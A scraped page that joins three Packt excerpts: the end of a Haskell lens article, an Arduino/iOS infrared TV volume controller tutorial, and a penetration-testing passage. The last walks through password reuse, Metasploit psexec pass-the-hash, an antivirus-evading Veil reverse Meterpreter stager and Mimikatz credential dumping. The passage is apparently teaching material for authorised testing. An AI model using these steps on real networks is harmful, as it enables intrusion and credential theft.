Patterns, Gamma et al, 1995 In The Essence of the Iterator Pattern, Jeremy Gibbons shows precisely how the Applicative traversal captures the Iterator pattern. The Traversable.traverse class is the Applicative version of Traversable.mapM, which means it is more general than mapM (because Applicative is more general than Monad). Moreover, because mapM does not rely on the Monadic bind chain to communicate between iteration steps, Monad is a superfluous type for mapping with effects (Applicative is sufficient). In other words, Applicative traverse is superior to Monadic traversal (mapM): "In addition to being parametrically polymorphic in the collection elements, the generic traverse operation is parametrised along two further dimensions: the datatype being tra- versed, and the applicative functor in which the traversal is interpreted" "The improved compositionality of applicative functors over monads provides better glue for fusion of traversals, and hence better support for modular programming of iterations"                                        The Essence of the Iterator Pattern - Jeremy Gibbons Modernizing Haskell 98 The introduction of Applicative, along with Foldable and Traversable, had a big impact on Haskell. Foldable and Traversable lift Prelude fold and map to a much higher level of abstraction. Moreover, Foldable and Traversable also bring a clean separation between processes that preserve or discard the shape of the structure that is being processed. Traversable describes processes that preserve that shape of the data structure being traversed over. Foldable processes, in turn, discard or transform the shape of the structure being folded over. Since Traversable is a specialization of Foldable, we can say that shape preservation is a special case of shape transformation. This line between shape preservation and transformation is clearly visible from the fact that functions that discard their results (for example, mapM_, forM_, sequence_, and so on) are in Foldable, while their shape-preserving counterparts are in Traversable. Due to the relatively late introduction of Applicative, the benefits of Applicative, Foldable, and Traversable have not found their way into the core of the language. This is due to the change with the Foldable Traversable In Prelude proposal (planned for inclusion in the core libraries from GHC 7.10). For more information, visit https://wiki.haskell.org/Foldable_Traversable_In_Prelude. This will involve replacing less generic functions in Prelude, Control.Monad, and Data.List with their more polymorphic counterparts in Foldable and Traversable. There have been objections to the movement to modernize, the main concern being that more generic types are harder to understand, which may compromise Haskell as a learning language. These valid concerns will indeed have to be addressed, but it seems certain that the Haskell community will not resist climbing to new abstract heights. Lenses A Lens is a type that provides access to a particular part of a data structure. Lenses express a high-level pattern for composition. However, Lens is also deeply entwined with Traversable, and so we describe it in this article instead. Lenses relate to the getter and setter functions, which also describe access to parts of data structures. To find our way to the Lens abstraction (as per Edward Kmett's Lens library), we'll start by writing a getter and setter to access the root node of a Tree. Deriving Lens Returning to our Tree from earlier: data Tree a = Node a (Tree a) (Tree a) | Leaf a deriving (Show) intTree = Node 2 (Leaf 3) (Node 5 (Leaf 7) (Leaf 11)) listTree = Node [1,1] (Leaf [2,1]) (Node [3,2] (Leaf [5,2]) (Leaf [7,4])) tupleTree = Node (1,1) (Leaf (2,1)) (Node (3,2) (Leaf (5,2)) (Leaf (7,4))) Let's start by writing generic getter and setter functions: getRoot :: Tree a -> a getRoot (Leaf z) = z getRoot (Node z _ _) = z setRoot :: Tree a -> a -> Tree a setRoot (Leaf z) x = Leaf x setRoot (Node z l r) x = Node x l r main = do print $ getRoot intTree print $ setRoot intTree 11 print $ getRoot (setRoot intTree 11) If we want to pass in a setter function instead of setting a value, we use the following: fmapRoot :: (a -> a) -> Tree a -> Tree a fmapRoot f tree = setRoot tree newRoot where newRoot = f (getRoot tree) We have to do a get, apply the function, and then set the result. This double work is akin to the double traversal we saw when writing traverse in terms of sequenceA. In that case we resolved the issue by defining traverse first (and then sequenceA i.t.o. traverse): We can do the same thing here by writing fmapRoot to work in a single step (and then rewriting setRoot' i.t.o. fmapRoot'): fmapRoot' :: (a -> a) -> Tree a -> Tree a fmapRoot' f (Leaf z) = Leaf (f z) fmapRoot' f (Node z l r) = Node (f z) l r setRoot' :: Tree a -> a -> Tree a setRoot' tree x = fmapRoot' (_ -> x) tree main = do print $ setRoot' intTree 11 print $ fmapRoot' (*2) intTree The fmapRoot' function delivers a function to a particular part of the structure and returns the same structure: fmapRoot' :: (a -> a) -> Tree a -> Tree a To allow for I/O, we need a new function: fmapRootIO :: (a -> IO a) -> Tree a -> IO (Tree a) We can generalize this beyond I/O to all Monads: fmapM :: (a -> m a) -> Tree a -> m (Tree a) It turns out that if we relax the requirement for Monad, and generalize f' to all the Functor container types, then we get a simple van Laarhoven Lens! type Lens' s a = Functor f' => (a -> f' a) -> s -> f' s The remarkable thing about a van Laarhoven Lens is that given the preceding function type, we also gain "get", "set", "fmap", "mapM", and many other functions and operators. The Lens function type signature is all it takes to make something a Lens that can be used with the Lens library. It is unusual to use a type signature as "primary interface" for a library. The immediate benefit is that we can define a lens without referring to the Lens library. We'll explore more benefits and costs to this approach, but first let's write a few lenses for our Tree. The derivation of the Lens abstraction used here has been based on Jakub Arnold's Lens tutorial, which is available at http://blog.jakubarnold.cz/2014/07/14/lens-tutorial-introduction-part-1.html. Writing a Lens A Lens is said to provide focus on an element in a data structure. Our first lens will focus on the root node of a Tree. Using the lens type signature as our guide, we arrive at: lens':: Functor f => (a -> f' a) -> s -> f' s root :: Functor f' => (a -> f' a) -> Tree a -> f' (Tree a) Still, this is not very tangible; fmapRootIO is easier to understand with the Functor f' being IO: fmapRootIO :: (a -> IO a) -> Tree a -> IO (Tree a) fmapRootIO g (Leaf z) = (g z) >>= return . Leaf fmapRootIO g (Node z l r) = (g z) >>= return . (x -> Node x l r) displayM x = print x >> return x main = fmapRootIO displayM intTree If we drop down from Monad into Functor, we have a Lens for the root of a Tree: root :: Functor f' => (a -> f' a) -> Tree a -> f' (Tree a) root g (Node z l r) = fmap (x -> Node x l r) (g z) root g (Leaf z) = fmap Leaf (g z) As Monad is a Functor, this function also works with Monadic functions: main = root displayM intTree As root is a lens, the Lens library gives us the following: -– import Control.Lens main = do -- GET print $ view root listTree print $ view root intTree -- SET print $ set root [42] listTree print $ set root 42 intTree -- FMAP print $ over root (+11) intTree The over is the lens way of fmap'ing a function into a Functor. Composable getters and setters Another Lens on Tree might be to focus on the rightmost leaf: rightMost :: Functor f' => (a -> f' a) -> Tree a -> f' (Tree a) rightMost g (Node z l r) = fmap (r' -> Node z l r') (rightMost g r) rightMost g (Leaf z) = fmap (x -> Leaf x) (g z) The Lens library provides several lenses for Tuple (for example, _1 which brings focus to the first Tuple element). We can compose our rightMost lens with the Tuple lenses: main = do print $ view rightMost tupleTree print $ set rightMost (0,0) tupleTree -- Compose Getters and Setters print $ view (rightMost._1) tupleTree print $ set (rightMost._1) 0 tupleTree print $ over (rightMost._1) (*100) tupleTree A Lens can serve as a getter, setter, or "function setter". We are composing lenses using regular function composition (.)! Note that the order of composition is reversed in (rightMost._1) the rightMost lens is applied before the _1 lens. Lens Traversal A Lens focuses on one part of a data structure, not several, for example, a lens cannot focus on all the leaves of a Tree: set leaves 0 intTree over leaves (+1) intTree To focus on more than one part of a structure, we need a Traversal class, the Lens generalization of Traversable). Whereas Lens relies on Functor, Traversal relies on Applicative. Other than this, the signatures are exactly the same: traversal :: Applicative f' => (a -> f' a) -> Tree a -> f' (Tree a) lens :: Functor f'=> (a -> f' a) -> Tree a -> f' (Tree a) A leaves Traversal delivers the setter function to all the leaves of the Tree: leaves :: Applicative f' => (a -> f' a) -> Tree a -> f' (Tree a) leaves g (Node z l r) = Node z <$> leaves g l <*> leaves g r leaves g (Leaf z) = Leaf <$> (g z) We can use set and over functions with our new Traversal class: set leaves 0 intTree over leaves (+1) intTree The Traversals class compose seamlessly with Lenses: main = do -- Compose Traversal + Lens print $ over (leaves._1) (*100) tupleTree -- Compose Traversal + Traversal print $ over (leaves.both) (*100) tupleTree -- map over each elem in target container (e.g. list) print $ over (leaves.mapped) (*(-1)) listTree -- Traversal with effects mapMOf leaves displayM tupleTree (The both is a Tuple Traversal that focuses on both elements). Lens.Fold The Lens.Traversal lifts Traversable into the realm of lenses: main = do print $ sumOf leaves intTree print $ anyOf leaves (>0) intTree The Lens Library We used only "simple" Lenses so far. A fully parametrized Lens allows for replacing parts of a data structure with different types: type Lens s t a b = Functor f' => (a -> f' b) -> s -> f' t –- vs simple Lens type Lens' s a = Lens s s a a Lens library function names do their best to not clash with existing names, for example, postfixing of idiomatic function names with "Of" (sumOf, mapMOf, and so on), or using different verb forms such as "droppingWhile" instead of "dropWhile". While this creates a burden as i.t.o has to learn new variations, it does have a big plus point—it allows for easy unqualified import of the Lens library. By leaving the Lens function type transparent (and not obfuscating it with a new type), we get Traversals by simply swapping out Functor for Applicative. We also get to define lenses without having to reference the Lens library. On the downside, Lens type signatures can be bewildering at first sight. They form a language of their own that requires effort to get used to, for example: mapMOf :: Profunctor p => Over p (WrappedMonad m) s t a b -> p a (m b) -> s -> m t foldMapOf :: Profunctor p => Accessing p r s a -> p a r -> s -> r On the surface, the Lens library gives us composable getters and setters, but there is much more to Lenses than that. By generalizing Foldable and Traversable into Lens abstractions, the Lens library lifts Getters, Setters, Lenses, and Traversals into a unified framework in which they are all compose together. Edward Kmett's Lens library is a sprawling masterpiece that is sure to leave a lasting impact on idiomatic Haskell. Summary We started with Lists (Haskel 98), then generalizing for all Traversable containers (Introduced in the mid-2000s). Following that, we saw how the Lens library (2012) places traversing in an even broader context. Lenses give us a unified vocabulary to navigate data structures, which explains why it has been described as a "query language for data structures". Resources for Article: Further resources on this subject: Plotting in Haskell[article] The Hunt for Data[article] Getting started with Haskell [article]
Read more
  • 0
  • 0
  • 15213

article-image-tv-set-constant-volume-controller
Packt
25 Sep 2015
19 min read
Save for later

TV Set Constant Volume Controller

Packt
25 Sep 2015
19 min read
In this article by Fabizio Boco, author of  Arduino iOS Bluprints, we learn how to control a TV set volume using Arduino and iOS. I don't watch TV much, but when I do, I usually completely relax and fall asleep. I know that TV is not meant for putting you off to sleep, but it does this to me. Unfortunately, commercials are transmitted at a very high volume and they wake me up. How can I relax if commercials wake me up every five minutes? Can you believe it? During one of my naps between two commercials, I came up with a solution based on iOS and Arduino. It's nothing complex. An iOS device listens to the TV set's audio, and when the audio level becomes higher than a preset threshold, the iOS device sends a message (via Bluetooth) to Arduino, which controls the TV set volume, emulating the traditional IR remote control. Exactly the same happens when the volume drops below another threshold. The final result is that the TV set volume is almost constant, independent of what is on the air. This helps me sleep longer! The techniques that you are going to learn in this article are useful in many different ways. You can use an IR remote control for any purpose, or you can control many different devices, such as a CD/DVD player, a stereo set, Apple TV, a projector, and so on, directly from an Arduino and iOS device. As always, it is up to your imagination. (For more resources related to this topic, see here.) Constant Volume Controller requirements Our aim is to design an Arduino-based device, which can make the TV set's volume almost constant by emulating the traditional remote controller, and an iOS application, which monitors the TV and decides when to decrease or increase the TV set's volume. Hardware Most TV sets can be controlled by an IR remote controller, which sends signals to control the volume, change the channel, and control all the other TV set functions. IR remote controllers use a carrier signal (usually at 38 KHz) that is easy to isolate from noise and disturbances. The carrier signal is turned on and off by following different rules (encoding) in order to transmit the 0 and 1 digital values. The IR receiver removes the carrier signal (with a pass low filter) and decodes the remaining signal by returning a clear sequence of 0 and 1. The IR remote control theory You can find more information about the IR remote control at http://bit.ly/1UjhsIY. Our circuit will emulate the IR remote controller by using an IR LED, which will send specific signals that can be interpreted by our TV set. On the other hand, we can receive an IR signal with a phototransistor and decode it into an understandable sequence of numbers by designing a demodulator and a decoder. Nowadays, electronics is very simple; an IR receiver module (Vishay 4938) will manage the complexity of signal demodulation, noise cancellation, triggering, and decoding. It can be directly connected to Arduino, making everything very easy. In the project in this article, we need an IR receiver to discover the coding rules that are used by our own IR remote controller (and the TV set). Additional electronic components In this project, we need the following additional components: IR LED Vishay TSAL6100 IR Receiver module Vishay TSOP 4838 Resistor 100Ω Resistor 680Ω Electrolytic capacitor 0.1μF Electronic circuit The following picture shows the electrical diagram of the circuit that we need for the project: The IR receiver will be used only to capture the TV set's remote controller signals so that our circuit can emulate them. However, an IR LED is constantly used to send commands to the TV set. The other two LEDs will show when Arduino increases or decreases the volume. They are optional and can be omitted. As usual, the Bluetooth device is used to receive commands from the iOS device. Powering the IR LED in the current limits of Arduino From the datasheet of the TSAL6100, we know that the forward voltage is 1.35V. The voltage drop along R1 is then 5-1.35 = 3.65V, and the current provided by Arduino to power the LED is about 3.65/680=5.3 mA. The maximum current that is allowed for each PIN is 40 mA (the recommended value is 20 mA). So, we are within the limits. In case your TV set is far from the LED, you may need to reduce the R1 resistor in order to get more current (and the IR light). Use a new value of R1 in the previous calculations to check whether you are within the Arduino limits. For more information about the Arduino PIN current, check out http://bit.ly/1JosGac. The following diagram shows how to mount the circuit on a breadboard: Arduino code The entire code of this project can be downloaded from https://www.packtpub.com/books/content/support. To understand better the explanations in the following paragraphs, open the downloaded code while reading them. In this project, we are going to use the IR remote library, which helps us code and decode IR signals. The library can be downloaded from http://bit.ly/1Isd8Ay and installed by using the following procedure: Navigate to the release page of http://bit.ly/1Isd8Ay in order to get the latest release and download the IRremote.zip file. Unzip the file whatever you like. Open the Finder and then the Applications folder (Shift + Control + A). Locate the Arduino application. Right-click on it and select Show Package Contents. Locate the Java folder and then libraries. Copy the IRremote folder (unzipped in step 2) into the libraries folder. Restart Arduino if you have it running. In this project, we need the following two Arduino programs: One is used to acquire the codes that your IR remote controller sends to increase and decrease the volume The other is the main program that Arduino has to run to automatically control the TV set volume Let's start with the code that is used to acquire the IR remote controller codes. Decoder setup code In this section, we will be referring to the downloaded Decode.ino program that is used to discover the codes that are used by your remote controller. Since the setup code is quite simple, it doesn't require a detailed explanation; it just initializes the library to receive and decode messages. Decoder main program In this section, we will be referring to the downloaded Decode.ino program; the main code receives signals from the TV remote controller and dumps the appropriate code, which will be included in the main program to emulate the remote controller itself. Once the program is run, if you press any button on the remote controller, the console will show the following: For IR Scope: +4500 -4350 … For Arduino sketch: unsigned int raw[68] = {4500,4350,600,1650,600,1600,600,1600,…}; The second row is what we need. Please refer to the Testing and tuning section for a detailed description of how to use this data. Now, we will take a look at the main code that will be running on Arduino all the time. Setup code In this section, we will be referring to the Arduino_VolumeController.ino program. The setup function initializes the nRF8001 board and configures the pins for the optional monitoring LEDs. Main program The loop function just calls the polACI function to allow the correct management of incoming messages from the nRF8001 board. The program accepts the following two messages from the iOS device (refer to the rxCallback function): D to decrease the volume I to increase the volume The following two functions perform the actual increasing and decreasing of volume by sending the two up and down buffers through the IR LED: void volumeUp() { irsend.sendRaw(up, VOLUME_UP_BUFFER_LEN, 38); delay(20); } void volumeDown() { irsend.sendRaw(down, VOLUME_DOWN_BUFFER_LEN, 38); delay(20); irsend.sendRaw(down, VOLUME_DOWN_BUFFER_LEN, 38); delay(20); } The up and down buffers, VOLUME_UP_BUFFER_LEN and VOLUME_DOWN_BUFFER_LEN, are prepared with the help of the Decode.ino program (see the Testing and Tuning section). iOS code In this article, we are going to look at the iOS application that monitors the TV set volume and sends the volume down or volume up commands to the Arduino board in order to maintain the volume at the desired value. The full code of this project can be downloaded from https://www.packtpub.com/books/content/support. To understand better the explanations in the following paragraphs, open the downloaded code while reading them. Create the Xcode project We will create a new project as we already did previously. The following are the steps that you need to follow: The following are the parameters for the new project: Project Type: Tabbed application Product Name: VolumeController Language: Objective-C Devices: Universal To set a capability for this project, perform the following steps: Select the project in the left pane of Xcode. Select Capabilities in the right pane. Turn on the Background Modes option and select Audio and AirPlay (refer to the following picture). This allows an iOS device to listen to audio signals too when the iOS device screen goes off or the app goes in the background: Since the structure of this project is very close to the Pet Door Locker, we can reuse a part of the user interface and the code by performing the following steps: Select FirstViewController.h and FirstViewController.m, right-click on them, click on Delete, and select Move to Trash. With the same procedure, deleteSecondViewControllerand Main.storyboard. Open the PetDoorLocker project in Xcode. Select the following files and drag and drop them to this project (refer to the following picture). BLEConnectionViewController.h     BLEConnectionViewController.m     Main.storyboardEnsure that Copy items if needed is selected and then click on Finish. Copy the icon that was used for the BLEConnectionViewController view controller. Create a new View Controller class and name it VolumeControllerViewController. Open the Main.storyboard and locate the main View Controller. Delete all the graphical components. Open the Identity Inspector and change the Class to VolumeControllerViewController. Now, we are ready to create what we need for the new application. Design the user interface for VolumeControllerViewController This view controller is the main view controller of the application and contains just the following components: The switch that turns on and off the volume control The slider that sets the desired volume of the TV set Once you have added the components and their layout constraints, you will end up with something that looks like the following screenshot: Once the GUI components are linked with the code of the view controller, we end with the following code: @interface VolumeControllerViewController () @property (strong, nonatomic) IBOutlet UISlider *volumeSlider; @end and with: - (IBAction)switchChanged:(UISwitch *)sender { … } - (IBAction)volumeChanged:(UISlider *)sender { … } Writing code for BLEConnectionViewController Since we copied this View Controller from the Pet Door Locker project, we don't need to change it apart from replacing the key, which was used to store the peripheral UUID, from PetDoorLockerDevice to VolumeControllerDevice. We saved some work! Now, we are ready to work on the VolumeControllerViewController, which is much more interesting. Writing code for VolumeControllerViewController This is the main part of the application; almost everything happens here. We need some properties, as follows: @interface VolumeControllerViewController () @property (strong, nonatomic) IBOutlet UISlider *volumeSlider; @property (strong, nonatomic) CBCentralManager *centralManager; @property (strong, nonatomic) CBPeripheral *arduinoDevice; @property (strong, nonatomic) CBCharacteristic *sendCharacteristic; @property (nonatomic,strong) AVAudioEngine *audioEngine; @property float actualVolumeDb; @property float desiredVolumeDb; @property float desiredVolumeMinDb; @property float desiredVolumeMaxDb; @property NSUInteger increaseVolumeDelay; @end Some are used to manage the Bluetooth communication and don't need much explanation. The audioEngine is the instance of AVAudioEngine, which allows us to transform the audio signal captured by the iOS device microphone in numeric samples. By analyzing these samples, we can obtain the power of the signal that is directly related to the TV set's volume (the higher the volume, the greater the signal power). Analog-to-digital conversion The operation of transforming an analog signal into a digital sequence of numbers, which represent the amplitude of the signal itself at different times, is called analog-to-digital conversion. Arduino analog inputs perform exactly the same operation. Together with the digital-to-analog conversion, it is a basic operation of digital signal processing and storing music in our devices and playing it with a reasonable quality. For more details, visit http://bit.ly/1N1QyXp. The actualVolumeDb property stores the actual volume of the signal measured in dB (short for decibel). Decibel (dB) The decibel (dB) is a logarithmic unit that expresses the ratio between two values of a physical quantity. Referring to the power of a signal, its value in decibel is calculated with the following formula: Here, P is the power of the signal and P0[PRK1]  is a reference power. You can find out more about decibel at http://bit.ly/1LZQM0m. We have to point out that if P < P0[PRK2] , the value of PdB[PRK3]  if lower of zero. So, decibel values are usually negative values, and 0dB indicates the maximum power of the signal. The desiredVolumeDb property stores the desired volume measured in dB, and the user controls this value through the volume slider in the main tab of the app; desiredVolumeMinDb and desiredVolumeMaxDb are derived from the desiredVolumeDb. The most significant part of the code is in the viewDidLoad method (refer to the downloaded code). First, we instantiate the AudioEngine and get the default input node, which is the microphone, as follows: _audioEngine = [[AVAudioEngine alloc] init]; AVAudioInputNode *input = [_audioEngine inputNode]; The AVAudioEngine is a very powerful class, which allows digital audio signal processing. We are just going to scratch its capabilities. AVAudioEngine You can find out more about AVAudioEngine by visiting http://apple.co/1kExe35 (AVAudioEngine in practice) and http://apple.co/1WYG6Tp. The AVAudioEngine and other functions that we are going to use require that we add the following imports: #import <AVFoundation/AVFoundation.h> #import <Accelerate/Accelerate.h> By installing an audio tap on the bus for our input node, we can get the numeric representation of the signal that the iOS device is listening to, as follows: [input installTapOnBus:0 bufferSize:8192 format:[input inputFormatForBus:0] block:^(AVAudioPCMBuffer* buffer, AVAudioTime* when) { … … }]; As soon as a new buffer of data is available, the code block is called and the data can be processed. Now, we can take a look at the code that transforms the audio data samples into actual commands to control the TV set: for (UInt32 i = 0; i < buffer.audioBufferList->mNumberBuffers; i++) { Float32 *data = buffer.audioBufferList->mBuffers[i].mData; UInt32 numFrames = buffer.audioBufferList->mBuffers[i].mDataByteSize / sizeof(Float32); // Squares all the data values vDSP_vsq(data, 1, data, 1, numFrames*buffer.audioBufferList->mNumberBuffers); // Mean value of the squared data values: power of the signal float meanVal = 0.0; vDSP_meanv(data, 1, &meanVal, numFrames*buffer.audioBufferList->mNumberBuffers); // Signal power in Decibel float meanValDb = 10 * log10(meanVal); _actualVolumeDb = _actualVolumeDb + 0.2*(meanValDb - _actualVolumeDb); if (fabsf(_actualVolumeDb) < _desiredVolumeMinDb && _centralManager.state == CBCentralManagerStatePoweredOn && _sendCharacteristic != nil) { //printf("Decrease volumen"); NSData* data=[@"D" dataUsingEncoding:NSUTF8StringEncoding]; [_arduinoDevice writeValue:data forCharacteristic:_sendCharacteristic type:CBCharacteristicWriteWithoutResponse]; _increaseVolumeDelay = 0; } if (fabsf(_actualVolumeDb) > _desiredVolumeMaxDb && _centralManager.state == CBCentralManagerStatePoweredOn && _sendCharacteristic != nil) { _increaseVolumeDelay++; } if (_increaseVolumeDelay > 10) { //printf("Increase volumen"); _increaseVolumeDelay = 0; NSData* data=[@"I" dataUsingEncoding:NSUTF8StringEncoding]; [_arduinoDevice writeValue:data forCharacteristic:_sendCharacteristic type:CBCharacteristicWriteWithoutResponse]; } } In our case, the for cycle is executed just once because we have just one buffer and we are using only one channel. The power of a signal, represented by N samples, can be calculated by using the following formula: Here, v is the value of the nth signal sample. Because the power calculation has to performed in real time, we are going to use the following functions, which are provided by the Accelerated Framework: vDSP_vsq: This function calculates the square of each input vector element vDSP_meanv: This function calculates the mean value of the input vector elements The Accelerated Framework The Accelerated Framework is an essential tool that is used for digital signal processing. It saves you time in implementing the most used algorithms and mostly providing implementation of algorithms that are optimized in terms of memory footprint and performance. More information on the Accelerated Framework can be found at http://apple.co/1PYIKE8 and http://apple.co/1JCJWYh. Eventually, the signal power is stored in _actualVolumeDb. When the modulus of _actualVolumeDb is lower than the _desiredVolumeMinDb, the TV set's volume is too high, and we need to send a message to Arduino to reduce it. Don't forget that _actualVolumeDb is a negative number; the modulus decreases this number when the TV set's volume increases. Conversely, when the TV set's volume decreases, the _actualVolumeDb modulus increases, and when it gets higher than _desiredVolumeMaxDb, we need to send a message to Arduino to increase the TV set's volume. During pauses in dialogues, the power of the signal tends to decrease even if the volume of the speech is not changed. Without any adjustment, the increasing and decreasing messages are continuously sent to the TV set during dialogues. To avoid this misbehavior, we send the volume increase message. Only after this does the signal power stay over the threshold for some time (when _increaseVolumeDelay is greater than 10). We can take a look at the other view controller methods that are not complex. When the view belonging at the view controller appears, the following method is called: -(void)viewDidAppear:(BOOL)animated { [super viewDidAppear:animated]; NSError* error = nil; [self connect]; _actualVolumeDb = 0; [_audioEngine startAndReturnError:&error]; if (error) { NSLog(@"Error %@",[error description]); } } In this function, we connect to the Arduino board and start the audio engine in order to start listening to the TV set. When the view disappears from the screen, the viewDidDisappearmethod is called, and we disconnect from the Arduino and stop the audio engine, as follows: -(void)viewDidDisappear:(BOOL)animated { [self viewDidDisappear:animated]; [self disconnect]; [_audioEngine pause]; } The method that is called when the switch is operated (switchChanged) is pretty simple: - (IBAction)switchChanged:(UISwitch *)sender { NSError* error = nil; if (sender.on) { [_audioEngine startAndReturnError:&error]; if (error) { NSLog(@"Error %@",[error description]); } _volumeSlider.enabled = YES; } else { [_audioEngine stop]; _volumeSlider.enabled = NO; } } The method that is called when the volume slider changes is as follows: - (IBAction)volumeChanged:(UISlider *)sender { _desiredVolumeDb = 50.*(1-sender.value); _desiredVolumeMaxDb = _desiredVolumeDb + 2; _desiredVolumeMinDb = _desiredVolumeDb - 3; } We just set the desired volume and the lower and upper thresholds. The other methods that are used to manage the Bluetooth connection and data transfer don't require any explanation, because they are exactly like in the previous projects. Testing and tuning We are now ready to test our new amazing system and spend more and more time watching TV (or taking more and more naps!) Let's perform the following procedure: Load the Decoder.ino sketch and open the Arduino IDE console. Point your TV remote controller to the TSOP4838 receiver and press the button that increases the volume. You should see something like the following appearing on the console: For IR Scope: +4500 -4350 … For Arduino sketch: unsigned int raw[68] = {4500,4350,600,1650,600,1600,600,1600,…}; Copy all the values between the curly braces. Open the Arduino_VolumeController.ino and paste the values for the following: unsigned int up[68] = {9000, 4450, …..,}; Check whether the length of the two vectors (68 in the example) is the same and modify it, if needed. Point your TV remote controller to the TSOP4838 receiver and press the button that decreases the volume. Copy the values and paste them for: unsigned int down[68] = {9000, 4400, ….,}; Check whether the length of the two vectors (68 in the example) is the same and modify it, if needed. Upload the Arduino_VolumeController.ino to Arduino and point the IR LED towards the TV set. Open the iOS application, scan for the nRF8001, and then go to the main tab. Tap on connect and then set the desired volume by touching the slider. Now, you should see the blue LED and the green LED flashing. The TV set's volume should stabilize to the desired value. To check whether everything is properly working, increase the volume of the TV set by using the remote control; you should immediately see the blue LED flashing and the volume getting lower to the preset value. Similarly, by decreasing the volume with the remote control, you should see the green LED flashing and the TV set's volume increasing. Take a nap, and the commercials will not wake you up! How to go further The following are some improvements that can be implemented in this project: Changing channels and controlling other TV set functions. Catching handclaps to turn on or off the TV set. Adding a button to mute the TV set. Muting the TV set on receiving a phone call. Anyway, you can use the IR techniques that you have learned for many other purposes. Take a look at the other functions provided by the IRremote library to learn the other provided options. You can find all the available functions in the IRremote.h that is stored in the IRremote library folder. On the iOS side, try to experiment with the AV Audio Engine and the Accelerate Framework that is used to process signals. Summary This artcle focused on an easy but useful project and taught you how to use IR to transmit and receive data to and from Arduino. There are many different applications of the basic circuits and programs that you learned here. On the iOS platform, you learned the very basics of capturing sounds from the device microphone and the DSP (digital signal processing). This allows you to leverage the processing capabilities of the iOS platform to expand your Arduino projects. Resources for Article: Further resources on this subject: Internet Connected Smart Water Meter[article] Getting Started with Arduino[article] Programmable DC Motor Controller with an LCD [article]
Read more
  • 0
  • 0
  • 12130
article-image-exploiting-services-python
Packt
24 Sep 2015
15 min read
Save for later

Exploiting Services with Python

Packt
24 Sep 2015
15 min read
In this article by Christopher Duffy author of the book Learning Python Penetration Testing, we will learn about one of the big misconceptions with testing for the synchronization of account credentials today, is the prevalence of exploitable. You will still find vulnerabilities that can be exploited by overflowing the stack or heap, they are just significantly reduced or more complex. (For more resources related to this topic, see here.) Testing for the synchronization of account credentials With these results, we can determine if any of these credentials are reused in the network. We know there are Windows hosts primarily in the target network, but we need to identify which ones have port 445 open. We can then try and determine, which accounts might grant us access, when the following command is run: nmap -sS -vvv -p445 192.168.195.0/24 -oG output Then, parse the results for open ports with the following command, which will provide a file of target hosts with Server Message Block (SMB) enabled. grep 445/open output| cut -d" " -f2 >> smb_hosts The passwords can be extracted directly from John and written a password file that can be used for follow-on service attacks. john --show unshadowed |cut -d: -f2|grep -v " " > passwords Always test on a single host the first time you run this type of attack. In this example, we are using the sys account, but it is more common to use the root account or similar administrative accounts to test password reuse (synchronization) in an environment. The following attack using auxiliary/scanner/smb/smb_enumusers_domain will check for two things. It will identify what systems this account has access to, and the relevant users that are currently logged into the system. In the second portion of this example, we will highlight how to identify the accounts that are actually privileged and part of the Domain. There are good points and bad points about the smb_enumusers_domain module. The bad points are that you cannot load multiple usernames and passwords into it. That capability is reserved for the smb_login module. The problem with smb_login is that it is extremely noisy, as many signature detection tools flag on this method of testing for logins. The third module smb_enumusers, which can be used, but it only provides details related to locale users as it identifies users based on the Security Accounts Manager (SAM) file contents. So, if a user has a Domain account and has logged into the box, the smb_enumusers module will not identify them. So, understand each module and its limitations when identifying targets to laterally move. We are going to highlight how to configure the smb_enumusers_domain module and execute it. This will show an example of gaining access to a vulnerable host and then verifying DA account membership. This information can then be used to identify where a DA is located so that Mimikatz can be used to extract credentials. For this example, we are going to use a custom exploit using Veil as well, to attempt to bypass a resident Host Intrusion Prevention System (HIPS). More information about Veil can be found here at https://github.com/Veil-Framework/Veil-Evasion.git. So, we configure the module to use the password batman, and we target the local administrator account on the system. This can be changed, but often the default is used. Since it is the local administrator, the Domain is set to WORKGROUP. The following figure shows the configuration of the module: Before running commands such as these, make sure to use spool, to output the results to a log file so you can go back and review the results. As you can see in the following figure, the account provided details about who was logged into the system. This means that there are logged in users relevant to the returned account names and that the local administrator account will work on that system. This means this system is ripe for compromise by a Pass-the-Hash attack (PtH). The psexec module allows you to either pass the extracted Local Area Network Manager (LM): New Technology LM (NTLM) hash and username combination or just the username password pair to get access. To begin with, we setup a custom multi/handler to catch the custom exploit we generated by Veil as shownfollowing. Keep in mind, I used 443 for the local port because it bypasses most HIPS and the local host will change depending on your host. Now, we need to generate custom payloads with Veil to be used with the psexec module. You can do this by navigating to the Veil-Evasion installation directory and running it with python Veil-Evasion.py. Veil has a good number of payloads that can be generated with a variety of obfuscation or protection mechanisms, to see the specific payload you want to use, to execute the list command. You can select the payload by typing in the number of the payload or the name. As an example, run the following commands to generate a C Sharp stager that does not use shell code, keep in mind this requires specific versions of .NET on the target box to work. use cs/meterpreter/rev_tcp set LPORT 443 set LHOST 192.168.195.160 set use_arya Y generate There are two components to a typical payload, the stager and the stage. A stager sets up the network connection between the attacker and the victim. Payloads that often use native system languages can be purely stager. The second part is the stage, which are the components that are downloaded by the stager. These can include things like your Meterpreter. If both items are combined, they are called a single; think about when you create your malicious Universal Serial Bus (USB) drives, these are often singles. The output will be an executable, that will spawn an encrypted reverse HyperText Transfer Protocol Secure (HTTPS) Meterpreter. The payload can be tested with the script checkvt, which safely verifies if the payload would be picked up by most HIPS solutions. It does this without uploading it to Virus Total, and in turn does not add the payload to the database, which many HIPS providers pull from. Instead, it compares the hash of the payload to those already in the database. Now, we can setup the psexec module to reference the custom payload for execution. Update the psexec module, so that it uses the custom payload generated by Veil-Evasion, via set EXE::Custom and disable the automatic payload handler with set DisablePayloadHandler true, as shown following: Exploit the target box, and then attempt to identify who the DAs are in the Domain. This can be done in one of two ways, either by using the post/windows/gather/enum_domain_group_users module or the following command from shell access. net group "Domain Admins" We can then Grep through the spooled output file from the previously run module to locate relevant systems that might have these Das logged into. When gaining access to one of those systems, there would likely be DA tokens or credentials in memory, which can be extracted and reused. The following command is an example of how to analyze the log file for these types of entries. grep <username> <spoofile.log> As you can see, this very simple exploit path allows you to identify where the DAs are. Once you are on the system all you have to do is load mimikatz and extract the credentials typically with the wdigest command from the established Meterpreter session. Of course, this means the system has to be newer than Windows 2000, and have active credentials in memory. If not, it will take additional effort and research to move forward. To highlight this, we use our established session to extract credentials with Mimikatz as you can see following. The credentials are in memory and since the target box was Windows XP machine, we have no conflicts and no additional research is required. In addition to the intelligence we have gathered from extracting the active DA list from the system, we now have another set of confirmed credentials that can be used. Rinsing and repeating this method of attack allows you to quickly move laterally around the network till you identify viable targets. Automating the exploit train with Python This exploit train 